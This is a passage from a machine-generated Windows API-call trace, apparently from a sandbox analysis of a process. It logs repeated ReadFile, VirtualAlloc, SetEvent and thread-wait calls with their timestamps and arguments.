lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c980*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0127.729] VirtualAlloc (lpAddress=0xc00006a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00006a000 [0127.730] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000c9c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c9c0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0130.206] SetEvent (hEvent=0xf0) returned 1 [0130.206] VirtualAlloc (lpAddress=0xc00006c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00006c000 [0130.207] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000ca00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000ca00*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0130.207] VirtualAlloc (lpAddress=0xc00006e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00006e000 [0130.207] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000ca80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000ca80*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0130.207] VirtualAlloc (lpAddress=0xc000070000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000070000 [0130.207] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000cac0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cac0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0136.178] SetEvent (hEvent=0xf0) returned 1 [0136.178] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000cb00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cb00*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0136.178] VirtualAlloc (lpAddress=0xc000072000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000072000 [0136.179] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000cb80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cb80*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0136.179] VirtualAlloc (lpAddress=0xc000074000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000074000 [0136.179] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000cbc0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cbc0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0145.683] SetEvent (hEvent=0xf0) returned 1 [0145.684] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000cc00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cc00*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0145.684] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000cc80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cc80*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0145.684] VirtualAlloc (lpAddress=0xc000076000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000076000 [0145.685] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000ccc0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000ccc0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0149.669] SetEvent (hEvent=0xf0) returned 1 [0149.669] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000cd00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cd00*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0149.669] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000cd80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cd80*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0149.670] VirtualAlloc (lpAddress=0xc000078000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000078000 [0149.670] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000cdc0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cdc0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0154.501] SetEvent (hEvent=0xf0) returned 1 [0154.501] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000ce00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000ce00*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0154.501] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000ce80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000ce80*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0154.501] VirtualAlloc (lpAddress=0xc00007a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00007a000 [0154.502] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000cec0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cec0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0158.864] SetEvent (hEvent=0xf0) returned 1 [0158.864] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000cf00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cf00*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0158.864] VirtualAlloc (lpAddress=0xc00007c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00007c000 [0158.864] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000cf80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cf80*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0158.864] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000cfc0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cfc0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0162.747] SetEvent (hEvent=0xf0) returned 1 [0162.747] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d000, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d000*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0162.748] VirtualAlloc (lpAddress=0xc000200000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000200000 [0162.748] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d080, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d080*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0162.748] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d0c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d0c0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0166.163] SetEvent (hEvent=0xf0) returned 1 [0166.163] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d100, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d100*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0166.163] VirtualAlloc (lpAddress=0xc000202000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000202000 [0166.163] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d180, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d180*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0166.163] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d1c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d1c0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0170.573] SetEvent (hEvent=0xf0) returned 1 [0170.573] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d200, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d200*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0170.573] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d280, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d280*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0170.573] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d2c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d2c0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0172.386] SetEvent (hEvent=0xf0) returned 1 [0172.386] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d300, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d300*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0173.837] SetEvent (hEvent=0xf0) returned 1 [0173.837] VirtualAlloc (lpAddress=0xc000206000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000206000 [0173.837] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d380, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d380*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0173.838] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d3c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d3c0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0178.197] SetEvent (hEvent=0xf0) returned 1 [0178.198] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d400, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d400*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0178.198] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d480, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d480*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0178.198] VirtualAlloc (lpAddress=0xc000208000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000208000 [0178.204] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d4c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d4c0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0181.202] SetEvent (hEvent=0xf0) returned 1 [0181.202] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d500, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d500*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0181.202] VirtualAlloc (lpAddress=0xc00020a000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00020a000 [0181.202] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d580, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d580*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0181.202] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d5c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d5c0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0184.732] SetEvent (hEvent=0xf0) returned 1 [0184.732] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d600, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d600*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0184.733] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d680, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d680*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0184.733] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d6c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d6c0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0186.146] SetEvent (hEvent=0xf0) returned 1 [0186.147] VirtualAlloc (lpAddress=0xc00020e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00020e000 [0186.147] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d700, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d700*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0187.516] SetEvent (hEvent=0xf0) returned 1 [0187.516] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d780, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d780*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0187.517] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d7c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d7c0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0188.941] SetEvent (hEvent=0xf0) returned 1 [0188.941] VirtualAlloc (lpAddress=0xc000210000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000210000 [0188.942] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d800, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d800*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0190.330] SetEvent (hEvent=0xf0) returned 1 [0190.330] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d880, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d880*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0190.330] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d8c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d8c0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0191.455] SetEvent (hEvent=0xf0) returned 1 [0191.455] VirtualAlloc (lpAddress=0xc000212000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000212000 [0191.455] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d900, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d900*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0191.456] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d980, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d980*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0191.456] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000d9c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d9c0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0194.473] SetEvent (hEvent=0xf0) returned 1 [0194.473] VirtualAlloc (lpAddress=0xc000214000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000214000 [0194.474] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000da00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000da00*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0195.876] SetEvent (hEvent=0xf0) returned 1 [0195.876] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000da80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000da80*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0195.876] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000dac0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000dac0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0197.225] SetEvent (hEvent=0xf0) returned 1 [0197.225] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000db00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000db00*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0198.612] SetEvent (hEvent=0xf0) returned 1 [0198.612] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000db80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000db80*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0198.612] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000dbc0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000dbc0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0199.548] SetEvent (hEvent=0xf0) returned 1 [0199.548] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000dc00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000dc00*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0199.548] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000dc80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000dc80*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0199.549] VirtualAlloc (lpAddress=0xc00021a000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00021a000 [0199.549] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000dcc0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000dcc0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0201.432] SetEvent (hEvent=0xf0) returned 1 [0201.433] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000dd00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000dd00*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0202.197] SetEvent (hEvent=0xf0) returned 1 [0202.197] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000dd80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000dd80*, lpNumberOfBytesRead=0xc000027ddc*=0x37, lpOverlapped=0x0) returned 1 [0202.216] VirtualAlloc (lpAddress=0xc00021e000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00021e000 [0202.217] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000de00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000de00*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0202.245] SetEvent (hEvent=0xf0) returned 1 [0202.245] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000de40, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000de40*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0202.898] SetEvent (hEvent=0xf0) returned 1 [0202.898] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000de80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000de80*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0203.285] SetEvent (hEvent=0xf0) returned 1 [0203.285] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000dec0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000dec0, lpNumberOfBytesRead=0xc000027ddc*=0x0, lpOverlapped=0x0) returned 0 [0223.092] SetEvent (hEvent=0xf0) returned 1 [0223.092] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0xb0 [0053.676] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x279cfea0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x279cfea0*=0x88) returned 1 [0053.676] VirtualQuery (in: lpAddress=0x279cfec0, lpBuffer=0x279cfec0, dwLength=0x30 | out: lpBuffer=0x279cfec0*(BaseAddress=0x279cf000, AllocationBase=0x277d0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0053.676] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0053.680] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0053.682] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0053.691] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0053.695] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0053.749] SetEvent (hEvent=0xac) returned 1 [0053.749] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0053.774] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0053.783] SetEvent (hEvent=0xa0) returned 1 [0053.783] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0053.785] SetEvent (hEvent=0xa0) returned 1 [0053.785] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0053.786] timeEndPeriod (uPeriod=0x1) returned 0x0 [0053.786] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xf0 [0053.786] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xf4 [0053.786] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0054.333] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0054.333] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x279cf680, ulCount=0x10, ulNumEntriesRemoved=0x279cf654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x279cf680, ulNumEntriesRemoved=0x279cf654) returned 0 [0054.333] SetEvent (hEvent=0xa0) returned 1 [0054.333] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0054.606] timeEndPeriod (uPeriod=0x1) returned 0x0 [0054.606] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea25) returned 0x0 [0054.627] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0054.627] VirtualAlloc (lpAddress=0xc000164000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000164000 [0054.628] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4625a0, lpParameter=0xc00012a380, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd8 [0054.629] CloseHandle (hObject=0xd8) returned 1 [0054.629] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0054.662] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0054.662] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0054.663] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0054.666] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0054.667] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0054.668] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0054.669] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0054.670] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0054.671] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0054.672] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0054.673] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0054.674] timeEndPeriod (uPeriod=0x1) returned 0x0 [0054.674] WaitForMultipleObjects (nCount=0x2, lpHandles=0x279cfdf8*=0xf0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0082.972] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0082.973] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0082.976] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x279cfe70) returned 0x102 [0082.992] 